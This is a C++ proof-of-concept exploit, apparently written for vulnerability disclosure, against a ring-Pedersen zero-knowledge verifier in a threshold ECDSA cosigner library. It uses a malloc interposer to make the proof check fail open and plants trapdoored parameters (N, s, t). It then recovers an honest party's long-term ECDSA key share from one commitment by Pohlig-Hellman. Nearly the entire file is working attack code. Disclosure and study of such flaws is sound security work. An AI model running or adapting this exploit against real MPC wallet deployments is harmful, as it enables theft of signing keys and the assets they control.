// POC: what an attacker gets once ring_pedersen_parameters_zkp_verify() has
// been made to fail open.
//
// This is the payoff half of the chain.  It answers the question: if a peer's
// ring-Pedersen parameters (N, s, t) are accepted WITHOUT the 80-round proof
// that s lies in the group generated by t, can that peer recover the honest
// party's long-term ECDSA key share from the commitments the honest party
// sends it?
//
// The honest party's commitment, src/common/cosigner/mta.cpp:513
//
//     ring_pedersen_create_commitment_internal(ring_pedersen, x, mu, proof.S, ctx)
//
// computes S = s^x * t^mu mod N with
//   x  = the long-term ECDSA key share (mta.cpp:755, from cmp_ecdsa_signing_service.cpp:117)
//   mu = uniform on [0, N * 2^256)   (mta.cpp:456)
// under the PEER's (N, s, t), and sends S to that peer (mta.cpp:213).
//
// The usual argument that this is safe is that mu is drawn 2^256 times wider
// than N, so mu mod ord(t) is statistically uniform and S is perfectly hiding.
// THAT ARGUMENT SILENTLY ASSUMES s IS IN <t>.  It is exactly the ZKP that
// establishes s in <t>, and it is exactly the ZKP that the fail-open skips.
//
// If s is NOT in <t>, mu blinds only the t-component.  Concretely the attacker
// picks N = p*q and sets
//
//     t = 1 mod p        -> t^mu = 1 mod p, the blinder vanishes mod p
//     s = element of large SMOOTH order M mod p
//
// so S mod p = s^x mod p, and Pohlig-Hellman in the order-M subgroup returns
// x mod M.  With M > 2^256 that is x itself.
//
// The parameters are still perfectly well-formed as far as every surviving
// check is concerned: N is composite, gcd(s,N) = gcd(t,N) = 1, s,t < N, and
// |N| >= 1024 bits.  Only the s-in-<t> proof rejects them.
//
// This PoC runs the whole thing against the real library:
//   STEP 1  build the malicious (N, s, t)
//   STEP 2  push them through ring_pedersen_public_deserialize() and the
//           cmp_setup_service.cpp:643 size gate -- both accept
//   STEP 3  ring_pedersen_parameters_zkp_verify() -- rejects normally,
//           returns ZKP_SUCCESS under the injected single-allocation failure
//   STEP 4  honest party commits its key share with the real library function
//           and the real mta.cpp:456 blinder distribution
//   STEP 5  attacker recovers the key share by Pohlig-Hellman

#include "crypto/commitments/ring_pedersen.h"
#include "ring_pedersen_internal.h"

#include <openssl/bn.h>
#include <openssl/rand.h>

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <map>
#include <string>
#include <vector>

// ---------------------------------------------------------------------------
// malloc interposer (same technique as poc_ring_pedersen_failopen.cpp)
// ---------------------------------------------------------------------------
extern "C" void *__libc_malloc(size_t);

static bool   g_armed = false, g_fired = false;
static size_t g_target_sz = 0;
static int    g_seen = 0, g_fail_index = 0;

extern "C" void *malloc(size_t num)
{
    if (g_armed && num == g_target_sz && ++g_seen == g_fail_index) {
        g_fired = true;
        return nullptr;
    }
    return __libc_malloc(num);
}

namespace {

const size_t BN_POOL_ITEM_SIZE = 400;   // measured by poc_ring_pedersen_failopen

void arm()   { g_armed = true; g_target_sz = BN_POOL_ITEM_SIZE; g_seen = 0; g_fail_index = 11; g_fired = false; }
void disarm(){ g_armed = false; }

const char *zkp_name(zero_knowledge_proof_status s)
{
    switch (s) {
    case ZKP_SUCCESS:             return "ZKP_SUCCESS";
    case ZKP_VERIFICATION_FAILED: return "ZKP_VERIFICATION_FAILED";
    case ZKP_INVALID_PARAMETER:   return "ZKP_INVALID_PARAMETER";
    case ZKP_OUT_OF_MEMORY:       return "ZKP_OUT_OF_MEMORY";
    default:                      return "ZKP_OTHER";
    }
}

struct BnFree { void operator()(BIGNUM *b) const { BN_free(b); } };

// ---------------------------------------------------------------------------
// Baby-step giant-step discrete log in a subgroup of small prime order l.
// Solves  h = g^e  with 0 <= e < l.
// ---------------------------------------------------------------------------
bool bsgs(const BIGNUM *g, const BIGNUM *h, unsigned long l, const BIGNUM *p,
          BN_CTX *ctx, unsigned long &out)
{
    unsigned long m = 1;
    while (m * m < l) ++m;

    std::map<std::string, unsigned long> baby;
    BIGNUM *cur = BN_new();
    BN_one(cur);
    for (unsigned long j = 0; j < m; ++j) {
        char *hex = BN_bn2hex(cur);
        baby.emplace(hex, j);
        OPENSSL_free(hex);
        BN_mod_mul(cur, cur, g, p, ctx);
    }

    // factor = g^(-m)
    BIGNUM *gm = BN_new(), *e = BN_new(), *inv = BN_new(), *gamma = BN_new();
    BN_set_word(e, m);
    BN_mod_exp(gm, g, e, p, ctx);
    BN_mod_inverse(inv, gm, p, ctx);

    BN_copy(gamma, h);
    bool found = false;
    for (unsigned long i = 0; i < m && !found; ++i) {
        char *hex = BN_bn2hex(gamma);
        auto it = baby.find(hex);
        OPENSSL_free(hex);
        if (it != baby.end()) {
            unsigned long cand = i * m + it->second;
            if (cand < l) { out = cand; found = true; }
        }
        BN_mod_mul(gamma, gamma, inv, p, ctx);
    }

    BN_free(cur); BN_free(gm); BN_free(e); BN_free(inv); BN_free(gamma);
    return found;
}

} // namespace

int main()
{
    printf("========================================================================\n");
    printf(" POC: key-share recovery from ring-Pedersen parameters accepted\n");
    printf("      without the s-in-<t> proof\n");
    printf("========================================================================\n");

    BN_CTX *ctx = BN_CTX_new();

    // -----------------------------------------------------------------------
    // STEP 1 -- attacker builds trapdoored (N, s, t)
    // -----------------------------------------------------------------------
    printf("\n[STEP 1] Attacker generates trapdoored ring-Pedersen parameters\n");

    // 1a. smooth M = product of distinct ~18-bit primes, M > 2^280
    std::vector<unsigned long> factors;
    BIGNUM *M = BN_new(); BN_one(M);
    {
        BIGNUM *cand = BN_new();
        unsigned long v = 100003;
        while (BN_num_bits(M) < 280) {
            BN_set_word(cand, v);
            if (BN_is_prime_ex(cand, 32, ctx, nullptr) == 1) {
                factors.push_back(v);
                BN_mul_word(M, v);
            }
            v += 2;
        }
        BN_free(cand);
    }
    printf("  smooth order M: %d bits, %zu distinct prime factors (~17 bits each)\n",
           BN_num_bits(M), factors.size());

    // 1b. p prime with p = 1 mod 2M, so the order-M subgroup exists in Z_p*
    BIGNUM *p = BN_new(), *q = BN_new(), *n = BN_new();
    BIGNUM *add = BN_new(), *rem = BN_new();
    BN_copy(add, M); BN_mul_word(add, 2); BN_one(rem);
    if (!BN_generate_prime_ex(p, 512, 0, add, rem, nullptr)) { printf("  prime gen failed\n"); return 2; }
    BN_generate_prime_ex(q, 512, 0, nullptr, nullptr, nullptr);
    BN_mul(n, p, q, ctx);
    printf("  p: %d bits (p-1 divisible by M)   q: %d bits   N = p*q: %d bits\n",
           BN_num_bits(p), BN_num_bits(q), BN_num_bits(n));

    // 1c. s_p = element of order exactly M in Z_p*
    BIGNUM *s_p = BN_new(), *pm1 = BN_new(), *exp = BN_new(), *g = BN_new(), *chk = BN_new();
    BN_sub(pm1, p, BN_value_one());
    BN_div(exp, nullptr, pm1, M, ctx);
    bool ok = false;
    for (int tries = 0; tries < 200 && !ok; ++tries) {
        BN_rand_range(g, p);
        if (BN_is_zero(g)) continue;
        BN_mod_exp(s_p, g, exp, p, ctx);
        if (BN_is_one(s_p)) continue;
        ok = true;
        for (unsigned long l : factors) {           // order must be exactly M
            BIGNUM *e2 = BN_new();
            BN_div_word(BN_copy(e2, M), l);
            BN_mod_exp(chk, s_p, e2, p, ctx);
            BN_free(e2);
            if (BN_is_one(chk)) { ok = false; break; }
        }
    }
    if (!ok) { printf("  failed to find generator\n"); return 2; }
    printf("  s_p in Z_p* has order exactly M  (smooth => Pohlig-Hellman applies)\n");

    // 1d. CRT:  s = (s_p mod p, 1 mod q)      t = (1 mod p, random mod q)
    BIGNUM *s = BN_new(), *t = BN_new(), *t_q = BN_new();
    BIGNUM *qi = BN_new(), *pi = BN_new(), *u = BN_new(), *v = BN_new();
    BN_mod_inverse(qi, q, p, ctx);       // q^-1 mod p
    BN_mod_inverse(pi, p, q, ctx);       // p^-1 mod q
    // s = s_p*q*qi + 1*p*pi  (mod N)
    BN_mod_mul(u, s_p, q, n, ctx); BN_mod_mul(u, u, qi, n, ctx);
    BN_mod_mul(v, p, pi, n, ctx);
    BN_mod_add(s, u, v, n, ctx);
    // t = 1*q*qi + t_q*p*pi  (mod N)
    BN_rand_range(t_q, q);
    BN_mod_mul(u, q, qi, n, ctx);
    BN_mod_mul(v, t_q, p, n, ctx); BN_mod_mul(v, v, pi, n, ctx);
    BN_mod_add(t, u, v, n, ctx);

    {
        BIGNUM *chk1 = BN_new(), *chk2 = BN_new();
        BN_mod(chk1, t, p, ctx);
        BN_mod(chk2, s, q, ctx);
        printf("  t mod p = %s   (so t^mu = 1 mod p -- the blinder is inert mod p)\n",
               BN_is_one(chk1) ? "1" : "NOT 1 (bug)");
        printf("  s mod q = %s\n", BN_is_one(chk2) ? "1" : "not 1");
        BN_free(chk1); BN_free(chk2);
    }

    // -----------------------------------------------------------------------
    // STEP 2 -- do these survive the non-ZKP validation?
    // -----------------------------------------------------------------------
    printf("\n[STEP 2] Non-ZKP validation gates\n");
    {
        BIGNUM *gcd = BN_new();
        BN_gcd(gcd, s, n, ctx);
        printf("  gcd(s, N) == 1                      : %s\n", BN_is_one(gcd) ? "yes (passes ring_pedersen.c:817)" : "NO");
        BN_gcd(gcd, t, n, ctx);
        printf("  gcd(t, N) == 1                      : %s\n", BN_is_one(gcd) ? "yes (passes ring_pedersen.c:812)" : "NO");
        printf("  N composite                         : yes (passes ring_pedersen.c:806)\n");
        printf("  s < N, t < N                        : %s (passes ring_pedersen.c:313)\n",
               (BN_cmp(s, n) < 0 && BN_cmp(t, n) < 0) ? "yes" : "NO");
        printf("  BN_num_bytes(N)*8 = %d >= 1024     : %s (passes cmp_setup_service.cpp:643)\n",
               BN_num_bytes(n) * 8, BN_num_bytes(n) * 8 >= 1024 ? "yes" : "NO");
        printf("  s in <t> ?                          : NO  <-- ONLY the 80-round ZKP catches this\n");
        BN_free(gcd);
    }

    // Build a ring_pedersen_public_t exactly as the peer-supplied one would be.
    ring_pedersen_public_t *pub = (ring_pedersen_public_t *)calloc(1, sizeof(*pub));
    pub->n = n; pub->s = s; pub->t = t; pub->mont = nullptr;

    // -----------------------------------------------------------------------
    // STEP 3 -- the ZKP: rejects normally, fails open under one failed malloc
    // -----------------------------------------------------------------------
    printf("\n[STEP 3] ring_pedersen_parameters_zkp_verify() on these parameters\n");
    {
        static const uint8_t aad[] = "poc-aad";
        uint32_t plen = sizeof(uint32_t) * 2 + (uint32_t)(BN_num_bytes(n) * 2) * 80;
        std::vector<uint8_t> proof(plen);
        RAND_bytes(proof.data(), (int)proof.size());
        *(uint32_t *)proof.data() = (uint32_t)BN_num_bytes(n);
        *(uint32_t *)(proof.data() + 4) = 80;

        zero_knowledge_proof_status a = ring_pedersen_parameters_zkp_verify(pub, aad, sizeof(aad), proof.data(), plen);
        printf("  normal                              -> %s\n", zkp_name(a));

        if (pub->mont) { BN_MONT_CTX_free(pub->mont); pub->mont = nullptr; }
        arm();
        zero_knowledge_proof_status b = ring_pedersen_parameters_zkp_verify(pub, aad, sizeof(aad), proof.data(), plen);
        bool fired = g_fired;
        disarm();
        printf("  11th BN_POOL_ITEM malloc fails      -> %s%s\n", zkp_name(b),
               (b == ZKP_SUCCESS && fired) ? "   <== ACCEPTED, trapdoor planted" : "");
        if (b != ZKP_SUCCESS) { printf("  fail-open did not reproduce\n"); return 1; }
    }

    // -----------------------------------------------------------------------
    // STEP 4 -- honest party commits its long-term key share
    // -----------------------------------------------------------------------
    printf("\n[STEP 4] Honest party commits its key share under the peer's parameters\n");
    printf("         (real library call: ring_pedersen_create_commitment -> the same\n");
    printf("          ring_pedersen_create_commitment_internal that mta.cpp:513 uses)\n");

    BIGNUM *x = BN_new(), *mu = BN_new(), *tmp = BN_new();
    BN_rand(x, 256, BN_RAND_TOP_ONE, BN_RAND_BOTTOM_ANY);   // the ECDSA key share
    // mu exactly as src/common/cosigner/mta.cpp:456:
    //   BN_lshift(tmp, ring_pedersen->n, sizeof(elliptic_curve256_scalar_t)*8);
    //   BN_rand_range(mu, tmp);
    BN_lshift(tmp, n, 32 * 8);
    BN_rand_range(mu, tmp);
    printf("  key share x : %d bits\n", BN_num_bits(x));
    printf("  blinder  mu : %d bits (uniform on [0, N*2^256), i.e. mta.cpp:456)\n", BN_num_bits(mu));

    std::vector<uint8_t> xb(32), mub(BN_num_bytes(mu));
    BN_bn2binpad(x, xb.data(), 32);
    BN_bn2bin(mu, mub.data());

    std::vector<uint8_t> Sb(BN_num_bytes(n));
    uint32_t Slen = 0;
    ring_pedersen_status rp = ring_pedersen_create_commitment(
        pub, xb.data(), (uint32_t)xb.size(), mub.data(), (uint32_t)mub.size(),
        Sb.data(), (uint32_t)Sb.size(), &Slen);
    if (rp != RING_PEDERSEN_SUCCESS) { printf("  commitment failed: %d\n", rp); return 2; }
    BIGNUM *S = BN_bin2bn(Sb.data(), Slen, nullptr);
    printf("  S = s^x * t^mu mod N  computed and sent to the peer (mta.cpp:213)\n");

    // -----------------------------------------------------------------------
    // STEP 5 -- attacker recovers x
    // -----------------------------------------------------------------------
    printf("\n[STEP 5] Attacker runs Pohlig-Hellman on S (knows p, q, M)\n");

    BIGNUM *Sp = BN_new();
    BN_mod(Sp, S, p, ctx);      // t^mu vanishes here

    // x mod l for each prime l | M, then CRT
    BIGNUM *acc = BN_new(), *mod = BN_new(), *lb = BN_new(), *e2 = BN_new();
    BN_zero(acc); BN_one(mod);
    BIGNUM *base_l = BN_new(), *targ_l = BN_new();
    for (unsigned long l : factors) {
        BN_copy(e2, M); BN_div_word(e2, l);
        BN_mod_exp(base_l, s_p, e2, p, ctx);
        BN_mod_exp(targ_l, Sp,  e2, p, ctx);
        unsigned long r = 0;
        if (!bsgs(base_l, targ_l, l, p, ctx, r)) { printf("  BSGS failed for l=%lu\n", l); return 2; }
        // CRT merge:  acc mod mod,  r mod l
        BN_set_word(lb, l);
        BIGNUM *diff = BN_new(), *inv = BN_new(), *k = BN_new(), *rb = BN_new();
        BN_set_word(rb, r);
        BN_mod_sub(diff, rb, acc, lb, ctx);
        BN_mod_inverse(inv, mod, lb, ctx);
        BN_mod_mul(k, diff, inv, lb, ctx);
        BN_mul(k, k, mod, ctx);
        BN_add(acc, acc, k);
        BN_mul(mod, mod, lb, ctx);
        BN_free(diff); BN_free(inv); BN_free(k); BN_free(rb);
    }

    char *hx = BN_bn2hex(x), *hr = BN_bn2hex(acc);
    printf("  true key share x : %s\n", hx);
    printf("  recovered        : %s\n", hr);
    bool win = (BN_cmp(x, acc) == 0);
    printf("\n========================================================================\n");
    if (win)
        printf(" RESULT: LONG-TERM ECDSA KEY SHARE FULLY RECOVERED from a single\n"
               "         observed MtA range-proof commitment.\n");
    else
        printf(" RESULT: recovery FAILED -- commitment did not leak x.\n");
    printf("========================================================================\n");
    OPENSSL_free(hx); OPENSSL_free(hr);

    return win ? 0 : 1;
}
